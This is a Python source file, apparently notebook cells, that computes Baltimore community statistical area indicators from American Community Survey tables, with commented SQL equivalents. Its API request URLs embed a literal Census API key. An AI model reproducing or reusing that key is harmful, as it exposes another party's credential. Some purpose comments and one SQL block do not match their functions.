# ( value[3] / nullif((value[1]-value[2]),0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_003E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
/* <drvalone_13> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B08101_001E','B08101_049E','B08101_009E'])
)
update vital_signs.data
set drvalone = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2013';
"""
# Cell
#File: hh25inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income Under 25K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh25inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 002
key = getColName(df, '002')
val = getColByName(df, '002')
fi[key] = val
# append into that dataframe col 003
key = getColName(df, '003')
val = getColByName(df, '003')
fi[key] = val
# append into that dataframe col 004
key = getColName(df, '004')
val = getColByName(df, '004')
fi[key] = val
# append into that dataframe col 005
key = getColName(df, '005')
val = getColByName(df, '005')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ]+ x[fi.columns[4] ] ) / x[fi.columns[0]])*100, axis=1)
# Cell
#File: mhhi.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2016 INFLATION-ADJUSTED DOLLARS)
# Universe: Households
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Sustainability - Percent of Population that Walks to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def mhhi( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
info = pd.DataFrame(
[
['B19001_002E', 0, 10000],
['B19001_003E', 10000, 4999 ],
['B19001_004E', 15000, 4999 ],
['B19001_005E', 20000, 4999 ],
['B19001_006E', 25000, 4999 ],
['B19001_007E', 30000, 4999],
['B19001_008E', 35000, 4999 ],
['B19001_009E', 40000, 4999 ],
['B19001_010E', 45000, 4999 ],
['B19001_011E', 50000, 9999 ],
['B19001_012E', 60000, 14999],
['B19001_013E', 75000, 24999 ],
['B19001_014E', 100000, 24999 ],
['B19001_015E', 125000, 24999 ],
['B19001_016E', 150000, 49000 ],
['B19001_017E', 200000, 1000000000000000000000000 ],
],
columns=['variable', 'lower', 'range']
)
# Final Dataframe
data_table = pd.DataFrame()
for index, row in info.iterrows():
#print(row['variable'], row['lower'], row['range'])
data_table = addKey(df, data_table, row['variable'])
# create a table of the accumulating total accross the columns from left to right for each csa.
temp_table = data_table.cumsum(axis=1)
# get the csa midpoint by divide column index 16 (the last column) of the cumulative totals
temp_table['midpoint'] = (temp_table.iloc[ : , -1 :] /2) # V3
temp_table['midpoint_index'] = False
temp_table['midpoint_index_value'] = False # Z3
temp_table['midpoint_index_lower'] = False # W3
temp_table['midpoint_index_range'] = False # X3
temp_table['midpoint_index_minus_one_cumulative_sum'] = False #Y3
# step 3 - csa_agg3: get the midpoint index by "when midpoint > agg[1] and midpoint <= agg[2] then 2"
# Get CSA Midpoint Index using the breakpoints in our info table.
# For each CSA
for index, row in temp_table.iterrows():
# Get the index of the first column where our midpoint is greater than the columns value.
# Do not use the temp columns (we just created)
midpoint = row['midpoint']
midpoint_index = 0
for column in row.iloc[:-6]:
# set midpoint index to the column with the highest value possible that is under midpoint
if( midpoint >= int(column) ):
# print (str(column) + ' - ' + str(midpoint))
temp_table.loc[ index, 'midpoint_index' ] = midpoint_index +1
midpoint_index += 1
temp_table = temp_table.drop('Unassigned--Jail')
for index, row in temp_table.iterrows():
temp_table.loc[ index, 'midpoint_index_value' ] = data_table.loc[ index, data_table.columns[row['midpoint_index']] ]
temp_table.loc[ index, 'midpoint_index_lower' ] = info.loc[ row['midpoint_index'] ]['lower']
temp_table.loc[ index, 'midpoint_index_range' ] = info.loc[ row['midpoint_index'] ]['range']
temp_table.loc[ index, 'midpoint_index_minus_one_cumulative_sum'] = row[ row['midpoint_index']-1 ]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# Calculation = (midpoint_lower::numeric + (midpoint_range::numeric * ( (midpoint - midpoint_upto_agg) / nullif(midpoint_total,0)
# Calculation = W3+X3*((V3-Y3)/Z3)
# v3 -> 1 - midpoint of households == sum / 2
# w3 -> 2 - lower limit of the income range containing the midpoint of the housing total == row[lower]
# x3 -> width of the interval containing the medium == row[range]
# z3 -> number of hhs within the interval containing the median == row[total]
# y3 -> 4 - cumulative frequency up to, but no==NOT including the median interval
#~~~~~~~~~~~~~~~
temp_table['final'] = temp_table['midpoint_index_lower']+temp_table['midpoint_index_range']*((temp_table['midpoint']-temp_table['midpoint_index_minus_one_cumulative_sum'])/temp_table['midpoint_index_value'])
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S1901_C01_012E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
temp_table['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return temp_table['final']
"""
/* <mmhhi_14> */ --
with tbl_csa as (
select a.*,b.count from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B19001_002E','B19001_003E','B19001_004E','B19001_005E','B19001_006E','B19001_007E','B19001_008E','B19001_009E','B19001_010E','B19001_011E','B19001_012E','B19001_013E','B19001_014E','B19001_015E','B19001_016E','B19001_017E','B19013_001E'])
a left join (select csa,count(*) as count from vital_signs.tracts group by csa) b
on a.csa = b.csa
),
info as (
select 'B19001_002E' as variable, 0 as lower, 10000 as range
union all select 'B19001_003E' as variable, 10000 as lower, 4999 as range
union all select 'B19001_004E' as variable, 15000 as lower, 4999 as range
union all select 'B19001_005E' as variable, 20000 as lower, 4999 as range
union all select 'B19001_006E' as variable, 25000 as lower, 4999 as range
union all select 'B19001_007E' as variable, 30000 as lower, 4999 as range
union all select 'B19001_008E' as variable, 35000 as lower, 4999 as range
union all select 'B19001_009E' as variable, 40000 as lower, 4999 as range
union all select 'B19001_010E' as variable, 45000 as lower, 4999 as range
union all select 'B19001_011E' as variable, 50000 as lower, 9999 as range
union all select 'B19001_012E' as variable, 60000 as lower, 14999 as range
union all select 'B19001_013E' as variable, 75000 as lower, 24999 as range
union all select 'B19001_014E' as variable, 100000 as lower, 24999 as range
union all select 'B19001_015E' as variable, 125000 as lower, 24999 as range
union all select 'B19001_016E' as variable, 150000 as lower, 49000 as range
union all select 'B19001_017E' as variable, 200000 as lower, null as range
),
csa_agg as (
select csa,value as total,count,
ARRAY[
(value[1]),
(value[1] + value[2]),
(value[1] + value[2] + value[3]),
(value[1] + value[2] + value[3] + value[4]),
(value[1] + value[2] + value[3] + value[4] + value[5]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15] + value[16])
] as agg,
value[17] as median,
variable from tbl_csa
),
csa_agg2 as (
select csa,count,median,total,agg,variable,
agg[16]/2::numeric as midpoint from csa_agg
),
csa_agg3 as (
select csa,count,median,total,agg,variable,midpoint,
(case
when midpoint <= agg[1] then 1
when midpoint > agg[1] and midpoint <= agg[2] then 2
when midpoint > agg[2] and midpoint <= agg[3] then 3
when midpoint > agg[3] and midpoint <= agg[4] then 4
when midpoint > agg[4] and midpoint <= agg[5] then 5
when midpoint > agg[5] and midpoint <= agg[6] then 6
when midpoint > agg[6] and midpoint <= agg[7] then 7
when midpoint > agg[7] and midpoint <= agg[8] then 8
when midpoint > agg[8] and midpoint <= agg[9] then 9
when midpoint > agg[9] and midpoint <= agg[10] then 10
when midpoint > agg[10] and midpoint <= agg[11] then 11
when midpoint > agg[11] and midpoint <= agg[12] then 12
when midpoint > agg[12] and midpoint <= agg[13] then 13
when midpoint > agg[13] and midpoint <= agg[14] then 14
when midpoint > agg[14] and midpoint <= agg[15] then 15
when midpoint > agg[15] and midpoint <= agg[16] then 16
when midpoint > agg[16] then 17
end) as midpoint_idx from csa_agg2
),
csa_agg4 as (
select csa,count,median,total,agg,variable,midpoint,midpoint_idx,
total[midpoint_idx] as midpoint_total,
(case
when (midpoint_idx - 1) = 0 then 0
else total[(midpoint_idx - 1)]
end) as midpoint_upto_total,
agg[midpoint_idx] as midpoint_agg, (case when (midpoint_idx - 1) = 0 then 0 else agg[(midpoint_idx - 1)] end) as midpoint_upto_agg,
variable[midpoint_idx] as midpoint_variable
from csa_agg3
),
csa_agg5 as (
select a.*,b.lower as midpoint_lower, b.range as midpoint_range from
csa_agg4 a left join info b on a.midpoint_variable = b.variable
),
tbl as (
select (CASE
when count = 1 OR csa = 'Baltimore City'
then median
else
(midpoint_lower::numeric +
(midpoint_range::numeric * (
(midpoint - midpoint_upto_agg) / nullif(midpoint_total,0)
)
)
)
END) as result,csa
from csa_agg5
)
UPDATE vital_signs.data
set mhhi = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: nohhint.py
#Author: Charles Karpati
#Date: 1/25/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B28011 - INTERNET SUBSCRIPTIONS IN HOUSEHOLD
# Universe: Households
#purpose: Percent of Population with Broadband Internet Access
#input: Year
#output:
import pandas as pd
import glob
def nohhint( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B28011*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B28011_001E', 'B28011_008E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B28011_008E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B28011_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E'])
)
update vital_signs.data
set affordm = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: novhcl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08201 - HOUSEHOLD SIZE BY VEHICLES AVAILABLE
# Universe: Households
#purpose: Produce Sustainability - Percent of Households with No Vehicles Available Indicator
#input: Year
#output:
import pandas as pd
import glob
def novhcl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08201*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08201_002E','B08201_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08201_002E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08201_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[1]/ nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <novhcl_14> */ --
WITH tbl AS (
select csa,
( value[1]/ nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08201_002E','B08201_001E'])
)
update vital_signs.data
set novhcl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: paa.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def paa( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['African-American%NH'] = df[ 'B03002_004E_Total_Not_Hispanic_or_Latino_Black_or_African_American_alone' ]/ tot * 100
return df1['African-American%NH']
# Cell
#File: ppac.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def ppac( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['AllOther%NH'] = (
df['B03002_008E_Total_Not_Hispanic_or_Latino_Some_other_race_alone']
+ df['B03002_005E_Total_Not_Hispanic_or_Latino_American_Indian_and_Alaska_Native_alone']
+ df['B03002_007E_Total_Not_Hispanic_or_Latino_Native_Hawaiian_and_Other_Pacific_Islander_alone']
)/ tot * 100
return df1['AllOther%NH']
# Cell
#File: phisp.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def phisp( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['Hisp%'] = df['B03002_012E_Total_Hispanic_or_Latino']/ tot * 100
return df1['Hisp%']
# Cell
#File: pwhite.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def pwhite( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['White%NH'] = df[ 'B03002_003E_Total_Not_Hispanic_or_Latino_White_alone' ]/ tot * 100
return df1['White%NH']
# Cell
#File: sclemp.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B14005 - SEX BY SCHOOL ENROLLMENT BY EDUCATIONAL ATTAINMENT BY EMPLOYMENT STATUS FOR THE POPULATION 16 TO 19 YEARS
# (Universe = Population 16 to 19 years)
#purpose: Produce Education and Youth - Percentage of Population aged 16-19 in School and/or Employed Indicator
#input: Year
#output:
import pandas as pd
import glob
def sclemp( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B14005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E',
'B14005_020E', 'B14005_023E', 'B14005_027E','B14005_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E', 'B14005_020E', 'B14005_023E', 'B14005_027E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B14005_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( ( value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] ) / nullif(value[11],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <sclemp_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] ) / nullif(value[11],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E', 'B14005_020E', 'B14005_023E', 'B14005_027E','B14005_001E']) )
update vital_signs.data
set sclemp = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: tpop.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def tpop( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
